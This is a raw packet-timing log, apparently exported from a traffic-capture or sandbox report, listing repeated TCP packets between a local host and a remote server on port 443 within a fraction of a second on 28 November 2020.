                                                                                                          Nov 28, 2020 10:27:38.837272882 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837310076 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837347031 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837354898 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837408066 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837452888 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837466002 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837491035 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837541103 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837547064 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837582111 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837620974 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837667942 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837670088 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837714911 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837727070 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837754011 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837791920 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837800026 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837831974 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837869883 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837877989 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837909937 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837949038 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.837958097 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.837999105 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838042021 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838054895 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838080883 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838119984 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838128090 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838159084 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838196039 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838201046 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838237047 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838275909 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838282108 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838324070 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838367939 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838370085 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838406086 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838444948 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838458061 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838485003 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838524103 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838530064 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838562012 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838601112 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838607073 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838649035 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838691950 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838696003 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838730097 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838793993 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838843107 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838907957 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838949919 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.838953018 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.838987112 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839031935 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839034081 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839167118 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839221954 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839294910 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839389086 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839428902 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839437008 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839467049 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839505911 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839523077 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839545012 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839589119 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839592934 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839637995 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839675903 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839688063 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839725018 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839765072 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839796066 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839802980 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839843035 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839880943 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839924097 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839930058 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.839943886 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.839975119 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840013027 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840051889 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840058088 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840095997 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840135098 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840166092 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840173960 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840177059 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840214014 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840260983 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840261936 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840308905 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840348005 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840362072 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840389013 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840429068 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840435982 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840467930 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840507984 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840516090 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840547085 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840596914 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840604067 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840640068 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840678930 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840688944 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840718985 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840758085 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840770960 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840796947 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840836048 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840847969 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840876102 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840923071 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.840926886 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.840966940 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841005087 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841017962 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841044903 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841084003 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841090918 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841120958 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841157913 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841166019 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841196060 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841250896 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841264963 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841295004 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841334105 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841350079 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841372013 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841404915 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841430902 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841442108 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841481924 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841495991 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841520071 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841532946 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841558933 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841567993 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841598988 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841607094 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841635942 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841650009 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841675997 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841713905 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841730118 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841761112 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841790915 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841803074 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841823101 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841841936 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841850042 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841881990 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841893911 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841922045 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.841931105 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841970921 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.841974020 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842006922 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842020988 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842037916 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842053890 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842076063 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842087984 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842109919 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842123032 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842139959 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842159033 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842170954 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842185020 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842200994 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842217922 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842232943 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842246056 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842263937 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842279911 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842294931 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842313051 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842333078 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842345953 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842367887 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842381001 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842397928 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842426062 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842434883 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842458010 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842466116 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842478991 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842495918 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842520952 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842525959 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842544079 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842556000 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842575073 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842592955 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842622995 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842626095 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842642069 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842655897 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842675924 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842685938 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842699051 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842716932 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842732906 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842746019 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842762947 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842777014 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842792988 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842806101 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842823029 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842844009 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842858076 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842879057 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842891932 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842907906 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842927933 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842938900 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842950106 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842969894 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.842984915 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.842999935 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843014002 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843031883 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843045950 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843061924 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843075991 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843099117 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843106985 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843132973 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843146086 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843162060 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843178034 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843193054 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843208075 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843225002 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843238115 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843255043 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843271017 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843285084 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843301058 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843314886 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843329906 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843353033 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843367100 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843386889 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843400002 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843417883 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843436003 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843447924 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843462944 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843477964 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843492031 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843507051 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843538046 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843538046 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843565941 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843566895 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843595028 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843605042 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843619108 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843637943 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843655109 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843667984 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843686104 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843698978 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843713999 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843729019 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843744993 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843759060 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843772888 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843789101 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843802929 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843820095 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.843836069 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.843866110 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.861690998 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.861722946 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.861826897 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.861869097 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.862456083 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.862492085 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.862534046 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.862556934 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.864206076 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.864245892 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.864310980 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.864341974 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.865892887 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.865926981 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.865957022 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.865988016 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.866168022 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.866202116 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.866225958 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.866233110 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.866250992 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.866265059 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.866290092 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.866296053 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.866326094 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.866342068 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.866386890 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.867094040 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.867176056 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.867225885 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.867286921 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.867346048 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.867399931 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.867503881 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.867537022 CET44349732162.159.135.233192.168.2.4
                                                                                                          Nov 28, 2020 10:27:38.867566109 CET49732443192.168.2.4162.159.135.233
                                                                                                          Nov 28, 2020 10:27:38.867567062 CET44349732162.159.135.233192.168.2.4
